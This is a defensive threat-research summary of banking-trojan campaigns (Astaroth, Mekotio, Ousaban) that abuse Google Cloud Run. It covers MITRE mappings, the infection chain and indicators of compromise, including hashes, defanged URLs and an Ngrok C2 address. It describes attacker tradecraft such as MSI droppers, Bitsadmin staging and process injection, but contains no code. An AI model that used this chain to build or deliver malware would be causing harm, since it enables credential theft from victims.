Threat Research

Astaroth, Mekotio & Ousaban abusing Google Cloud Run in LATAM-focused malware campaigns

Talos

Google Cloud Run has been abused to host high-volume distribution infrastructure that redirects victims to Google Cloud Storage ZIPs or serves malicious MSI installers directly, delivering banking trojans Astaroth (Guildma), Mekotio and Ousaban primarily to Latin American targets. The infection chains use MSIs as droppers (embedded JavaScript or binary streams), Bitsadmin for stage retrieval, AutoIt-based loaders and process injection into regsvcs.exe, with C2 over Ngrok/TCP and region-based cloaking. #Astaroth #Mekotio #Ousaban #GoogleCloudRun

Keypoints

  • Adversaries leverage Google Cloud Run URLs (run[.]app) to host or redirect to malicious payloads, massively increasing distribution since Sept 2023.
  • Astaroth, Mekotio and Ousaban are being delivered via malicious MSIs — Astaroth MSIs embed JavaScript, Mekotio MSIs include malicious DLL streams and a CAB archive.
  • Delivery often uses a 302 redirect from Cloud Run to storage[.]googleapis[.]com ZIP archives containing MSI files; some Cloud Run services also serve MSIs directly.
  • Stage retrieval relies on Bitsadmin (LoLBin) to download AutoIt binaries, compiled AutoIt scripts, sqlite3.dll and an XOR-encoded Ousaban blob (key 0x2A).
  • AutoIt-based loader decodes embedded payload (sdk.log), injects the final Astaroth payload into regsvcs.exe, establishes persistence via Startup LNK and exfiltrates credentials (including crypto exchanges).
  • Mekotio extracts CAB contents to %PROGRAMDATA% (libeay32.dll, ssleay32.dll, text file), then executes a DLL export; final Mekotio is Delphi + VMProtect and uses geolocation filtering via ipinfo.
  • Campaigns use cloaking (geolocation/proxy/crawler checks), Ngrok for C2 (1.tcp.sa.ngrok.io:26885) and variable C2 ports; distribution artifacts and hashes are published in the report.

MITRE Techniques

  • [T1566] Phishing – Malspam themes and lures used to deliver URLs (email subjects: invoices/tax documents): ‘these emails are being sent using themes related to invoices or financial and tax documents’
  • [T1102] Web Service – Use of Google Cloud Run to host redirectors and payloads: ‘victims are redirected to the Cloud Run web services deployed by the threat actors’
  • [T1105] Ingress Tool Transfer – Redirects to Google Cloud Storage ZIPs and direct delivery of MSI installers: ‘responds with a 302 redirect to a file location within Google Cloud … delivery of a ZIP archive containing a malicious MSI.’
  • [T1218] Signed Binary Proxy Execution – Abuse of Bitsadmin (LoLBin) to download next-stage components: ‘uses the Bitsadmin living-off-the-land binary (LoLBin) to retrieve the next-stage components’
  • [T1059] Command and Scripting Interpreter – Embedded JavaScript inside MSI (CustomAction.idt) and use of cmd.exe for file creation/execution: ’embedded JavaScript that has been placed into the CustomAction.idt file’
  • [T1055] Process Injection – Loader injects final Astaroth payload into a legitimate process (regsvcs.exe) in memory: ‘injects the final Astaroth payload into this process in memory’
  • [T1547.001] Boot or Logon Autostart Execution: Startup Folder – Persistence via a LNK in the Startup menu that launches the AutoIt binary: ‘establishes persistence using a LNK file in the Startup menu’
  • [T1071] Application Layer Protocol – C2 communications over TCP via Ngrok and TLS-over-TCP to remote servers: ‘communicates with C2 using Ngrok (1.tcp.sa.ngrok.io) over TCP/26885’

Indicators of Compromise

  • [Domain] distribution/redirect hosts – arr-wd3463btrq-uc.a.run.app, portu-wd3463btrq-uc.a.run.app, and many other run.app domains (see report for full list)
  • [URL] direct payload locations – hxxps://storage[.]googleapis[.]com/alele/FAT.1705617082.zip, hxxps://storage[.]googleapis[.]com/alele/Fat.184949849.zip
  • [IP] hosting/distribution server – 34[.]135[.]1[.]100 (observed as host for distribution URLs during analysis)
  • [Hashes SHA256] observed malware/artifact hashes – 4fa9e718fca1fa299beab1b5fea500a0e63385b5fe6d4eb1b1001f2abd97a828 (Mekotio MSI ZIP), 8d912a99076f0bdc4fcd6e76c51a1d598339c1502086a4381f5ef67520a0ddf2 (Astaroth MSI ZIP), and other hashes
  • [File names] installer and payload filenames – CustomAction.idt (embedded JS), sdk.log (Astaroth encoded payload), Oculus.Toshiba.01997.5591.272.exe (AutoIt binary name) and other working filenames

The technical infection flow and procedures condensed:

Email campaigns deliver Google Cloud Run (run.app) URLs that either serve MSIs directly or issue 302 redirects to storage[.]googleapis[.]com ZIP archives containing malicious MSI installers. The MSIs act as initial droppers: Astaroth MSIs include obfuscated JavaScript embedded in CustomAction.idt which, when executed, fetches an obfuscated JScript from attacker-controlled servers; Mekotio MSIs carry embedded DLL binary streams and a disk1.cab that is extracted to %PROGRAMDATA% (including libeay32.dll, ssleay32.dll and a text file) and then executed via exported functions.

The retrieved JScript/launcher uses cmd.exe to create working directories and then leverages the Bitsadmin LoLBin to download next-stage components (AutoIt3.exe, compiled AutoIt script, sqlite3.dll and an XOR-encoded PE blob for Ousaban with key 0x2A). The AutoIt compiled script contains a hex blob (DLL loader) that writes and decodes sdk.log (Astaroth payload) or the Ousaban PE, starts regsvcs.exe and injects the decoded Astaroth payload into that process. Persistence is achieved by dropping a .lnk in the Startup folder that invokes the AutoIt binary, and the malware collects credentials (including crypto exchanges), screenshots and keystrokes; C2 uses Ngrok (1.tcp.sa.ngrok.io:26885) or TLS-over-TCP (e.g., TCP/8088), while Mekotio additionally performs IP geolocation checks (ipinfo) to enforce regional filtering before proceeding to C2 communication.

Read more: https://blog.talosintelligence.com/google-cloud-run-abuse/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint